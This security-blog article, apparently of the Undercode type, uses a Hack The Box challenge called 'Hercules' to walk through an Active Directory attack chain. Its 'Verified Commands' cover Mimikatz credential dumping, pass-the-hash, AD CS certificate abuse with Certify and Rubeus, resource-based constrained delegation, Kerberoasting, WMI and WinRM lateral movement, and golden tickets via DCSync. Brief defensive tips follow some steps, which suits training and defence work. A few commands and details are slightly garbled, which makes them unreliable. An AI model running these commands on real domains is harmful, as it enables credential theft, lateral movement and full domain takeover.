Listen to this Post
Introduction:
A recent complex Hack The Box challenge, dubbed “Hercules,” demonstrates a critical cybersecurity truth: total domain compromise is rarely the result of a single critical flaw. Instead, it is the culmination of multiple minor misconfigurations in identity, delegation, and certificate services that, when chained together, create a catastrophic domino effect. This article deconstructs the attack paths prevalent in modern Active Directory environments, providing the commands and methodologies used by both penetration testers and defenders to identify and remediate these subtle yet devastating weaknesses.
Learning Objectives:
- Understand and identify common Active Directory misconfigurations related to Kerberos delegation and certificate services.
- Learn the offensive techniques to exploit these misconfigurations for privilege escalation and lateral movement.
- Implement defensive hardening measures to secure identity and access management fundamentals.
You Should Know:
1. Enumerating Kerberos Delegation
Unconstrained and constrained delegation are frequent sources of privilege escalation. Unconstrained delegation allows a service to impersonate any user to any other service, a significant security risk.
Verified Commands:
PowerView: Find computers with unconstrained delegation
Get-NetComputer -Unconstrained
AD Module: Find user and computer accounts with constrained delegation
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Using ldapsearch on Linux
ldapsearch -H ldap://dc.domain.com -x -b "DC=domain,DC=com" "(&(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
Step-by-step guide:
First, import PowerView into your PowerShell session. Running `Get-NetComputer -Unconstrained` will list all computer accounts configured with unconstrained delegation. An attacker can target these systems to capture TGTs (Ticket Granting Tickets) of high-value accounts, like Domain Admins, which may authenticate to the compromised service. For defenders, this enumeration is crucial for identifying and removing unnecessary delegation grants.
2. Abusing Certificate Templates for Domain Escalation
Active Directory Certificate Services (AD CS) can be misconfigured to allow low-privileged users to enroll in certificates that grant domain admin privileges.
Verified Commands:
PowerShell AD CS module: Enumerate certificate templates Get-CATemplate | Select-Name, Permissions Using Certify.exe to find vulnerable templates Certify.exe find /vulnerable Requesting a certificate using the SAN (Subject Alternative Name) exploit Certify.exe request /ca:DC.domain.com\CA /template:VulnerableTemplate /altname:domadmin
Step-by-step guide:
After downloading and compiling the `Certify` C tool, run `Certify.exe find /vulnerable` from a compromised user’s context. This will list templates where you have enrollment rights and that allow for privilege escalation, such as those enabling manager approval or defining overly permissive EKUs (Extended Key Usage). If a template allows a user to specify a Subject Alternative Name (SAN), you can request a certificate with a SAN set to a domain admin, which can then be used with `Rubeus` to obtain a TGT for that privileged account.
3. Dumping Credentials with Mimikatz
The quintessential tool for credential dumping from LSASS memory, often used after achieving local administrator rights on a machine.
Verified Commands:
Classic LSASS dump to get NTLM hashes and Kerberos tickets mimikatz privilege::debug mimikatz sekurlsa::logonpasswords Dumping Kerberos tickets from memory mimikatz sekurlsa::tickets /export PTH (Pass-the-Hash) attack execution mimikatz sekurlsa::pth /user:Administrator /domain:domain.com /ntlm:<hash> /run:cmd.exe
Step-by-step guide:
Ensure you have local admin privileges (privilege::debug must return “Privilege ’20’ OK”). The `sekurlsa::logonpasswords` command will extract plaintext passwords, NTLM hashes, and Kerberos tickets currently cached on the system. These credentials can be re-used for lateral movement (Pass-the-Hash, Pass-the-Ticket). Defenders can mitigate this by enabling Credential Guard on Windows 10/11 and Server 2016+ systems.
4. Forcing Kerberos Authentication for Privilege Escalation
Resource-Based Constrained Delegation (RBCD) can be exploited if you have the right to modify a computer object’s attributes.
Verified Commands:
PowerView: Check for GenericWrite, GenericAll rights on a computer object
Get-NetComputer | Get-ObjectAcl | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteProperty|GenericWrite"}
Configure RBCD on a target computer to allow a compromised machine to delegate to it
Set-ADComputer -Identity "TargetComputer$" -PrincipalsAllowedToDelegateToAccount "CompromisedMachine$"
Using the Rubeus tool to request a service ticket and then impersonate an admin
Rubeus.exe s4u /user:CompromisedMachine$ /rc4:<MachineHash> /impersonateuser:Administrator /msdsspn:http/TargetComputer.domain.com /ptt
Step-by-step guide:
First, enumerate which computer objects your compromised account has write permissions over using PowerView’s Get-ObjectAcl. If you have the necessary rights (e.g., GenericWrite), you can use the `Set-ADComputer` cmdlet to set the `msDS-AllowedToActOnBehalfOfOtherIdentity` property (RBCD) to a computer account you control. Then, using the NTLM hash of the compromised machine account, perform an S4U2Self/S4U2Proxy exchange with Rubeus to get a service ticket for the target computer as a Domain Admin and inject it into memory (/ptt).
5. Exploiting Active Directory Integration with Web Services
Web servers integrated with AD often have service principals. Misconfigurations in these SPNs can be exploited for Kerberoasting or via Web Shells to execute AD queries.
Verified Commands:
Requesting all service tickets for offline cracking (Kerberoasting)
GetUserSPNs.py domain.com/user:password -dc-ip <DC_IP> -request
Using a web shell to run AD queries via .NET
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher("(&(objectCategory=user)(samaccountname=admin))");
search.FindAll();
Using wmic from a command line for lateral movement
wmic /node:"TARGET_IP" /user:"DOMAIN\user" /password:"password" process call create "cmd.exe /c whoami > C:\output.txt"
Step-by-step guide:
Kerberoasting is a low-and-slow attack that targets service accounts. Using a tool like `GetUserSPNs.py` from the Impacket suite, you can request service tickets for all registered SPNs. These tickets are encrypted with the service account’s password hash and can be cracked offline. Defenders should implement strong, complex passwords for service accounts and consider using Group Managed Service Accounts (gMSAs), which have automatically managed, long, and complex passwords.
6. Lateral Movement with WMI and PowerShell Remoting
Once credentials are obtained, lateral movement is key to navigating the domain.
Verified Commands:
Using PowerShell Remoting with captured credentials
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\user", (ConvertTo-SecureString "password" -AsPlainText -Force))
Enter-PSSession -ComputerName TARGET_COMPUTER -Credential $cred
Executing a command remotely via WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName TARGET_COMPUTER -Credential $cred
Using the built-in PsExec-like functionality of Impacket's wmiexec
wmiexec.py domain/user:password@TARGET_IP
Step-by-step guide:
PowerShell Remoting (WinRM) is a common and powerful method for lateral movement. First, create a PSCredential object with the obtained credentials. The `Enter-PSSession` cmdlet will give you an interactive shell on the remote host. For non-interactive command execution, use Invoke-Command. Defenders should restrict WinRM and WMI access to administrative users only and monitor for anomalous remote connections, especially those using compromised service accounts.
7. Golden Ticket Attack for Persistent Domain Access
A Golden Ticket attack provides persistent, nearly undetectable access to the entire domain by forging Kerberos TGTs.
Verified Commands:
Using Mimikatz to create a Golden Ticket mimikatz kerberos::golden /user:fakeuser /domain:domain.com /sid:<Domain_SID> /krbtgt:<KRBTGT_NTLM_Hash> /id:500 /ptt Using the ticket to access the Domain Controller dir \DC.domain.com\C$ Command to dump the KRBTGT hash (requires Domain Admin) mimikatz lsadump::dcsync /user:domain\krbtgt
Step-by-step guide:
To create a Golden Ticket, you need the domain’s SID and the NTLM hash of the KRBTGT account, which can be obtained via a Domain Controller sync (lsadump::dcsync). Once you have these components, the `kerberos::golden` command in Mimikatz forges a TGT. Using `/ptt` injects this ticket into the current session, granting you Domain Admin access to any resource. The primary defense is to protect the KRBTGT account hash and consider rotating it twice (as per Microsoft’s recommendation) if a compromise is suspected.
What Undercode Say:
- The attack surface of Active Directory is vast and extends far beyond simple user passwords, residing in complex inter-service trust relationships like delegation and certificate enrollment.
- A defensive strategy focused solely on perimeter defense and patch management is insufficient; a deep understanding of identity and authentication flow within the network is paramount for resilience.
The “Hercules” box is a microcosm of modern corporate networks. It proves that attackers are not always looking for a single zero-day; they are methodically mapping the trust relationships you’ve built. The combination of unconstrained delegation, weak certificate template settings, and excessive service account permissions creates a predictable and exploitable chain. For blue teams, the lesson is that auditing these configurations is no longer optional. Continuous monitoring for abnormal authentication attempts, especially those involving protocol transitions (like S4U), and strict adherence to the principle of least privilege for delegation and certificate enrollment rights are the only ways to break these attack chains before they lead to a full-scale breach.
Prediction:
The sophistication of AD-based attacks will continue to evolve, moving further into the cloud-hybrid identity perimeter. As Pure on-premises AD becomes less common, attacks will increasingly target the trust relationships between on-prem AD and cloud Azure AD instances. Techniques similar to Golden Ticket attacks, but for cloud-based identity providers like Azure AD, will emerge, potentially leveraging misconfigured Conditional Access policies, Application Registrations, and Service Principals. The focus for attackers will shift from owning the on-prem domain controller to compromising the hybrid identity join, allowing them to pivot into the much broader and often less-monitored cloud environment.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Grisha Petrosyan – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
